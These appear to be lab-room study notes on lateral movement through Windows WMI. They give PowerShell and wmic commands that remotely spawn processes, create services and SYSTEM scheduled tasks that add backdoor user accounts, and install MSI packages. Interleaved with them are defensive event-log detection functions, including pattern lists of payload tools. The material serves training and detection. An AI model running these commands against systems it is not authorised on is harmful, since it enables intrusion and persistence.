General
==(Similar to Spawning Processes Remotely)==
"Moving Laterally Using WMI" is a technique for accessing and controlling other computers on a network through Windows Management Instrumentation (WMI). From PowerShell, WMI lets you connect to a remote host and create and manage processes, services and scheduled tasks there, as well as install MSI packages.
First, connect to WMI on the remote computer from PowerShell. Once connected, you can use WMI to create processes on that computer; this is called "Remote Process Creation Using WMI".
WMI can also create services remotely, so you can start and stop services on the remote computer without physical access to it. This is called "Creating Services Remotely with WMI".
WMI can also create scheduled tasks remotely, that is, tasks that run automatically on the remote computer at a given time. This is called "Creating Scheduled Tasks Remotely with WMI".
Finally, WMI can install MSI packages on the remote computer, so software can be installed without physical access to it. This is called "Installing MSI packages through WMI".
- Why use WMI rather than PsExec, SC.exe or a simple reverse shell?
- WMI is built into Windows, so it does not require any additional software to be installed. This can be useful in situations where you are not able to install additional tools on the target system.
- WMI allows for remote management of processes, services, and other aspects of the system, which can be useful for managing multiple systems at once.
- WMI can be used with PowerShell, which provides a rich set of commands for managing and automating Windows systems. This can make it easier to create scripts and automate tasks.
- WMI can provide more fine-grained control over processes. For example, the 'Create' method of the Win32_Process class allows passing more arguments than PSexec or SC, like priority level, working directory, etc.
- WMI can be used to establish persistence on the target machine using scheduled tasks.
Commands
Connecting to WMI
Before we can connect to WMI using PowerShell commands, we need to create a PSCredential object with our user and password. This object is stored in the $credential variable and used throughout the techniques in this task:
$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
We then proceed to establish a WMI session using either of the following protocols:
- DCOM: RPC over IP will be used for connecting to WMI. This protocol uses port 135/TCP and ports 49152-65535/TCP, just as explained when using sc.exe.
- Wsman: WinRM will be used for connecting to WMI. This protocol uses ports 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS).
To establish a WMI session from PowerShell, we can use the following commands and store the session in the $Session variable, which we will use throughout the room on the different techniques:
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
The New-CimSessionOption cmdlet is used to configure the connection options for the WMI session, including the connection protocol. The options and credentials are then passed to the New-CimSession cmdlet to establish a session against a remote host.
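Both transports described above have to be reachable before any of the techniques in this room work, so a host can be checked for that exposure from the defender's side. The following is an added example, not part of the original room: it reports the WinRM service and listener state, whether DCOM is enabled, and which enabled inbound firewall rules open 135, 5985 or 5986 and to which remote addresses. It assumes an elevated PowerShell on the host being checked; the function name is the author's own.

```powershell
# Added example: summarise how reachable the WMI transports (DCOM and WinRM) are on this host.
function Get-WmiRemoteExposure {
    $ports  = @('135', '5985', '5986')          # ports the room lists for DCOM and WinRM
    $result = [ordered]@{}

    # WSMan transport: is the WinRM service running, and does a listener answer locally?
    $winrm = Get-Service -Name WinRM -ErrorAction SilentlyContinue
    $result['WinRMService'] = if ($winrm) { $winrm.Status.ToString() } else { 'not installed' }
    $result['WinRMAnswers'] = [bool](Test-WSMan -ErrorAction SilentlyContinue)

    # DCOM transport: the machine-wide DCOM switch (REG_SZ "Y" means enabled)
    $ole = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Ole' -Name EnableDCOM -ErrorAction SilentlyContinue
    $result['DCOMEnabled'] = ($ole.EnableDCOM -eq 'Y')

    # Enabled inbound allow rules that open any of the listed ports (or all ports).
    # This walks every rule, so it takes a few seconds on a host with many rules.
    $open = foreach ($rule in Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow) {
        $pf = $rule | Get-NetFirewallPortFilter
        if ($pf.Protocol -notin 'TCP', 'Any') { continue }
        $rulePorts = @($pf.LocalPort)
        if (-not ($rulePorts | Where-Object { $_ -in $ports -or $_ -eq 'Any' })) { continue }
        $af = $rule | Get-NetFirewallAddressFilter
        [pscustomobject]@{
            Rule          = $rule.DisplayName
            Profile       = $rule.Profile
            LocalPort     = ($rulePorts -join ',')
            RemoteAddress = (@($af.RemoteAddress) -join ',')   # 'Any' = reachable from every source
        }
    }
    $result['OpenRules'] = @($open)
    [pscustomobject]$result
}

$exposure = Get-WmiRemoteExposure
$exposure | Select-Object WinRMService, WinRMAnswers, DCOMEnabled | Format-List
$exposure.OpenRules | Format-Table -AutoSize
```

Rules whose RemoteAddress is 'Any' on 135 or 5985/5986 are the ones worth scoping to management subnets.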
Remote Process Creation Using WMI
- Ports:
- 135/TCP, 49152-65535/TCP (DCERPC)
- 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
- Required Group Memberships: Administrators
We can remotely spawn a process from PowerShell by leveraging Windows Management Instrumentation (WMI), sending a WMI request to the Win32_Process class to spawn the process under the session we created before:
$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
Notice that WMI won't allow you to see the output of any command but will indeed create the required process silently.
On legacy systems, the same can be done using wmic from the command prompt:
wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe"
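On the target, both the Invoke-CimMethod call and the wmic command above end up as a child process of the WMI provider host, WmiPrvSE.exe. The following added example, not part of the original room, pulls process-creation events (Security log, event ID 4688) and keeps only those whose parent is WmiPrvSE.exe. It assumes "Audit Process Creation" is enabled and a Windows 10 / Server 2016 or later host, since earlier versions do not record the parent process name in 4688; the function name is the author's own.

```powershell
# Added example: list processes that the WMI provider host spawned, which is how
# Win32_Process.Create and "wmic process call create" look on the receiving end.
function Get-WmiSpawnedProcess {
    param(
        [datetime]$Since = (Get-Date).AddDays(-1),
        [string]$ComputerName = $env:COMPUTERNAME
    )
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = $Since }
    $events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Flatten the EventData <Data Name="..."> nodes into a hashtable
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        # Keep only children of the WMI provider host
        if ([string]$d['ParentProcessName'] -notmatch '\\WmiPrvSE\.exe$') { continue }

        [pscustomobject]@{
            Time        = $e.TimeCreated
            Computer    = $e.MachineName
            Creator     = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"  # Subject fields of the event
            NewProcess  = $d['NewProcessName']
            CommandLine = $d['CommandLine']   # empty unless command-line auditing is also enabled
        }
    }
}

Get-WmiSpawnedProcess -Since (Get-Date).AddHours(-6) | Format-Table -AutoSize -Wrap
```

With Sysmon installed, event ID 1 with ParentImage ending in WmiPrvSE.exe gives the same view and includes the command line by default.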
Creating Services Remotely with WMI
- Ports:
- 135/TCP, 49152-65535/TCP (DCERPC)
- 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
- Required Group Memberships: Administrators
We can create services with WMI through PowerShell. To create a service called THMService2, we can use the following command:
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "THMService2";
DisplayName = "THMService2";
PathName = "net user munra2 Pass123 /add"; # Your payload
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}
And then, we can get a handle on the service and start it with the following commands:
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'"
Invoke-CimMethod -InputObject $Service -MethodName StartService
Finally, we can stop and delete the service with the following commands:
Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete
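A service created this way is recorded on the target by the Service Control Manager as event ID 7045 ("a service was installed") in the System log, and its ImagePath is the payload string rather than a service executable. The following added example, not part of the original room, reads those events and flags ones whose binary path looks like a one-shot command. The heuristics and the function name are the author's assumptions for illustration and should be tuned to the estate.

```powershell
# Added example: review new-service events (System log, SCM event 7045) for payload-style ImagePaths.
function Get-SuspiciousServiceInstall {
    param([datetime]$Since = (Get-Date).AddDays(-7))

    # Interpreters and admin tools that are not service binaries but will happily run a payload
    $shellLike = '(^|\\|\s)(cmd|powershell|pwsh|net|net1|rundll32|mshta|wscript|cscript|regsvr32)(\.exe)?(\s|$)'
    $filter = @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045; StartTime = $Since }

    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $path = [string]$d['ImagePath']

        $reasons = @()
        if ($path -match $shellLike)         { $reasons += 'interpreter or admin tool as service binary' }
        if ($path -notmatch '\.(exe|sys)\b') { $reasons += 'ImagePath does not point at an .exe/.sys' }
        if ($path -match '\\Users\\|\\Temp\\|\\ProgramData\\') { $reasons += 'binary in a user-writable location' }
        if (-not $reasons) { continue }

        [pscustomobject]@{
            Time        = $e.TimeCreated
            ServiceName = $d['ServiceName']
            ImagePath   = $path
            RunAs       = $d['AccountName']   # LocalSystem unless StartName was given to Create
            StartType   = $d['StartType']
            Reasons     = ($reasons -join '; ')
        }
    }
}

Get-SuspiciousServiceInstall | Format-Table -AutoSize -Wrap
```

The THMService2 example above would be reported twice over: "net user ..." matches the interpreter pattern and contains no .exe.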
Creating Scheduled Tasks Remotely with WMI
- Ports:
- 135/TCP, 49152-65535/TCP (DCERPC)
- 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
- Required Group Memberships: Administrators
We can create and execute scheduled tasks by using some cmdlets available in Windows default installations:
# Payload must be split in Command and Args
$Command = "cmd.exe"
$Args = "/c net user munra22 aSdf1234 /add"
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2"
Start-ScheduledTask -CimSession $Session -TaskName "THMtask2"
To delete the scheduled task after it has been used, we can use the following command:
Unregister-ScheduledTask -CimSession $Session -TaskName "THMtask2"
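Registering a task, locally or over a CimSession, produces Security event 4698 on the target, and that event carries the full task definition XML (TaskContent), including the principal and the Exec action. The following added example, not part of the original room, decodes those events so a task such as THMtask2 shows up with its creator, the account it runs as and the command it executes. It assumes the "Audit Other Object Access Events" subcategory is enabled, otherwise 4698 is never written; the function name is the author's own.

```powershell
# Added example: decode scheduled-task creation events (Security 4698) including the embedded task XML.
function Get-TaskRegistrationEvent {
    param([datetime]$Since = (Get-Date).AddDays(-7))

    $filter = @{ LogName = 'Security'; Id = 4698; StartTime = $Since }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        # TaskContent is the task definition; PowerShell's [xml] adapter ignores the task namespace,
        # so plain dotted access works.
        $task      = [xml]$d['TaskContent']
        $actions   = @($task.Task.Actions.Exec)
        $principal = $task.Task.Principals.Principal

        # Register-ScheduledTask -User "NT AUTHORITY\SYSTEM" is stored as the SID S-1-5-18
        $runsAs = $principal.UserId
        if (-not $runsAs) { $runsAs = $principal.GroupId }
        $isSystem = $runsAs -match '^(S-1-5-18|NT AUTHORITY\\SYSTEM|SYSTEM)$'

        [pscustomobject]@{
            Time      = $e.TimeCreated
            CreatedBy = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            TaskName  = $d['TaskName']
            RunsAs    = $runsAs
            Command   = ($actions | ForEach-Object { "$($_.Command) $($_.Arguments)".Trim() }) -join ' | '
            Flag      = if ($isSystem) { 'runs as SYSTEM' } else { '' }
        }
    }
}

Get-TaskRegistrationEvent | Sort-Object Time -Descending | Format-Table -AutoSize -Wrap
```

Where the Security subcategory is not audited, the Microsoft-Windows-TaskScheduler/Operational log (event 106, task registered) records the task name and user but not the action, so 4698 is the richer source.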
Installing MSI packages through WMI
- Ports:
- 135/TCP, 49152-65535/TCP (DCERPC)
- 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
- Required Group Memberships: Administrators
MSI is a file format used for installers. If we can copy an MSI package to the target system, we can then use WMI to attempt to install it for us. The file can be copied in any way available to the attacker. Once the MSI file is in the target system, we can attempt to install it by invoking the Win32_Product class through WMI:
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}
The same can be achieved using wmic on legacy systems:
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi
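Whatever starts the install, the Windows Installer service logs each package it begins as MsiInstaller event 1040 in the Application log, with the package path and the PID of the client that requested it (for a Win32_Product.Install call that client is the WMI provider host, WmiPrvSE.exe). The following added example, not part of the original room, parses those messages and flags packages started from outside the directories where deployment tooling is expected to stage installers. The expected-directory list, the function name and the sample messages are constructed assumptions for illustration.

```powershell
# Added example: parse MsiInstaller 1040 messages and flag packages run from unexpected locations.
function ConvertFrom-MsiTransactionMessage {
    param(
        [string[]]$Message,
        # Constructed assumption: where legitimate deployments keep their .msi files in this estate
        [string[]]$ExpectedRoots = @('C:\Windows\Installer', 'C:\ProgramData\Deploy')
    )
    foreach ($m in $Message) {
        # 1040 message shape: "Beginning a Windows Installer transaction: <path>. Client Process Id: <pid>."
        if ($m -notmatch 'transaction:\s+(?<pkg>.+?\.msi)\.?\s+Client Process Id:\s+(?<pid>\d+)') { continue }
        $pkg = $Matches['pkg']
        $id  = [int]$Matches['pid']
        $known  = $ExpectedRoots | Where-Object { $pkg.StartsWith($_, [System.StringComparison]::OrdinalIgnoreCase) }
        $client = Get-Process -Id $id -ErrorAction SilentlyContinue   # only resolvable while the client still runs
        [pscustomobject]@{
            Package   = $pkg
            ClientPid = $id
            Client    = if ($client) { $client.ProcessName } else { 'exited' }
            Flag      = if ($known) { '' } else { 'package outside expected staging directories' }
        }
    }
}

# Constructed sample messages in the 1040 format so the parser can be exercised offline
$samples = @(
    'Beginning a Windows Installer transaction: C:\Windows\Installer\1a2b3c.msi. Client Process Id: 1234.',
    'Beginning a Windows Installer transaction: C:\Windows\myinstaller.msi. Client Process Id: 4321.'
)
ConvertFrom-MsiTransactionMessage -Message $samples | Format-Table -AutoSize

# Live query for the last 7 days (run on the host where the install happened)
$filter = @{ LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1040; StartTime = (Get-Date).AddDays(-7) }
$live = @(Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object { $_.Message })
if ($live) { ConvertFrom-MsiTransactionMessage -Message $live | Format-Table -AutoSize }
```

Of the two samples, only C:\Windows\myinstaller.msi is flagged; a client that resolves to WmiPrvSE.exe is the sign that the install was requested through WMI rather than by a logged-on user.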